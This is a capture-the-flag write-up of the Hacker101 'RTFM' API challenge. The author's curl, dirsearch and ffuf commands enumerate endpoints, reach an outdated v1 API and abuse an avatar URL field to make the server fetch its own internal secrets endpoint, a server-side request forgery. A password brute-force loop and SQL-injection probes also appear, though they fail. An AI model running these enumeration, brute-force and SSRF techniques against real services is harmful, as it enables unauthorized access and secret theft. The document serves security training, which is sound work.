pizza.slice (loaded active)

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Hacker101 RTFM

% export BASE_URL=''

We don’t get much for starters:

% curl ${BASE_URL}
API base located at /api/v1/
% curl ${BASE_URL}/api/v1
["Endpoint not found"]

I’ve been using dirsearch ( to enumerate endpoints:

% python3 -u ${BASE_URL}

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12266


[15:15:36] Scanning: 
[15:16:07] 200 -    3KB - /api/v2/swagger.json                              
Task Completed

That’s something! Off to a good start:

% curl --silent ${BASE_URL}/api/v2/swagger.json | jq
  "swagger": "2.0",
  "flag": "FLAG",
  "info": {

We get a handful of endpoints:

% curl --silent ${BASE_URL}/api/v2/swagger.json | jq '.paths' | grep '^  "'     
  "/api/v2/user": {
  "/api/v2/user/login": {
  "/api/v2/admin/user-list": {
  "/api/v2/user/posts/{id}": {

/api/v2/user POST endpoint is unauthenticated - that’s promising. So is /api/v2/user/login, but that requires a username and a password (maybe something to look at later).

% curl -d'username=pizza&password=pizza' ${BASE_URL}/api/v2/user
{"username":"pizza","flag":"FLAG","message":"User created go to \/api\/v2\/user\/login to login"}%

Let’s start a session as well:

% curl -d'username=pizza&password=pizza' ${BASE_URL}/api/v2/user/login

Let’s check out some endpoints:

% curl -H 'X-Session: edf12810e48a2bcf2d039b8d31851622' ${BASE_URL}/api/v2/user           
% curl -H 'X-Session: edf12810e48a2bcf2d039b8d31851622' ${BASE_URL}/api/v2/admin/user-list
{"error":"Your user level needs to be an admin"}
% curl -H 'X-Session: edf12810e48a2bcf2d039b8d31851622' ${BASE_URL}/api/v2/user/posts/1
{"error":"Post does not belong to you"}
% curl -H 'X-Session: edf12810e48a2bcf2d039b8d31851622' ${BASE_URL}/api/v2/user/posts/2
{"error":"Post does not exist"}

Not much. What about those /api/v1 endpoints the home page mentioned?

% curl ${BASE_URL}/api/v1/swagger.json                                  
["Endpoint not found"]
curl ${BASE_URL}/api/v1/login
["Endpoint not found"]
% curl -d'username=pizza&password=pizza' ${BASE_URL}/api/v1/user/login
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/admin/user-list
["Endpoint not found"]
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/admin/user-list
["Endpoint not found"]
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/user/posts/1
{"id":1,"post":"You got the Post: FLAG","analytics":"\/api\/v1\/post-analytics\/3c8a6664b8203c2e0b2b24972ccf5ce3"}

Alright! A flag, and a bonus endpoint to boot. Anything there?

% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/post-analytics/3c8a6664b8203c2e0b2b24972ccf5ce3
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/post-analytics/
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/campaigns
["Endpoint not found"]
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/campaigns/
["Endpoint not found"]
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/campaigns/3c8a6664b8203c2e0b2b24972ccf5ce3
["Endpoint not found"]

Maybe worth exploring. Possibly something we can explore in the v2 API as well? Let’s put a pin in that for the time being. We’ve got three out of eight flags, let’s start back at the top

Let’s hit the API endpoints we know about with dirsearch again:

% python3 -u ${BASE_URL}/api/v1/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12266


[16:10:32] Scanning: api/v1/
[16:11:13] 200 -   132B - /api/v1/config
[16:11:13] 200 -   132B - /api/v1/config/
[16:11:39] 403 -    51B - /api/v1/secrets
[16:11:39] 403 -    51B - /api/v1/secrets/
[16:11:41] 200 -    13B - /api/v1/status?full=true
[16:11:41] 200 -    13B - /api/v1/status
[16:11:41] 200 -    13B - /api/v1/status/
[16:11:49] 400 -    49B - /api/v1/user
[16:11:49] 400 -    49B - /api/v1/user/

Task Completed
% python3 -u ${BASE_URL}/api/v2/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12266


[16:22:40] Scanning: api/v2/
[16:23:57] 200 -    3KB - /api/v2/swagger.json                              
[16:24:00] 400 -    51B - /api/v2/user                                      
[16:24:00] 400 -    51B - /api/v2/user/                                     
Task Completed
% # That's something! 
% curl ${BASE_URL}/api/v1/config 

Halfway there! That secrets endpoint looks interesting, too - I think if we can find a way to get admin access we could probably get a flag or two.

Is there a way to create an admin user? There might be an undocumented flag, or maybe we can figure out the admin username and brute-force the password. The error message we got was {"error":"Your user level needs to be an admin"}.

% curl -d'username=admin&password=pizza' ${BASE_URL}/api/v2/user
{"error":"Username already exists"}
% # Neither of these produced users that could access ${BASE_URL}/api/v2/admin/user-list
% curl -d'username=pizza1&password=pizza&admin=true' ${BASE_URL}/api/v2/user
% curl -d'username=pizza2&password=pizza&level=admin' ${BASE_URL}/api/v2/user

Maybe brute-force? No luck with

for x in $(cat passwords.txt); do 
  echo "" 
  echo $x 
  curl -d"username=admin&password=${x}" ${BASE_URL}/api/v2/user/login

Maybe SQL injection? No luck with a handful of attacks:

% curl -d"username=admin&password='" ${BASE_URL}/api/v2/user/login
% curl -d"username='&password='" ${BASE_URL}/api/v2/user/login
% curl -d'username="&password="' ${BASE_URL}/api/v2/user/login
% curl -d'username="&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=@&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=*&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=../&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=;&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=;&password=;' ${BASE_URL}/api/v2/user/login
% curl -d'username=/**;&password=;' ${BASE_URL}/api/v2/user/login
{"error":"Invalid username \/ password combination"}%

This isn’t working. This is a CTF with hints, so let’s take a look at those. Maybe we can edit our profile? Doesn’t look like we have anything on v2, but for v1:

% curl -XPUT -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/user
{"error":"No updatable fields supplied"}

We don’t have documentation for this endpoint. What can we try?

What are some good nouns/verbs to use?

None of these worked. What am I missing? I read a write-up that suggested you could use ffuf to fuzz endpoints. Maybe we could find it that way?

I tried a number of options until I landed on something:

% history | grep ffuf

 # Hindsight is 20/20 - these failed because ffuf default behavior is _matching_ on 
 # certain HTTP status codes, but we're looking for an HTTP 400 with a different error message. 
 1261  ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=asdf'
 1262  ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=asdf' -fr '.*No updatable.*'
 1264  ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=FUZZ' -fr '.*No updatable.*'
 1265  ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=FUZZ' -fr 'error'
 1267  ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=1' -fr 'http'

 # Troubleshooting the matching issue - this matched everything. 
 1269  ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=1' -mr "updat"

 # Finally, the correct incantation - `-mc "all"` matches all HTTP status codes. 
 1273  ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=1' -fr "upda" -mc "all"

That gets us the updatable field, which gives us a way to retrieve the “secrets” endpoint:

curl -X PUT -d"avatar=http://localhost/api/v1/secrets/" -H 'X-Token: TOKEN' "${BASE_URL}/api/v1/user"
{"error":"Non Image detected","example_data":"{\"private_key\":\"FLAG\"}"}

That’s a little sour, since I had to look up the answer. But, ffuf seems useful!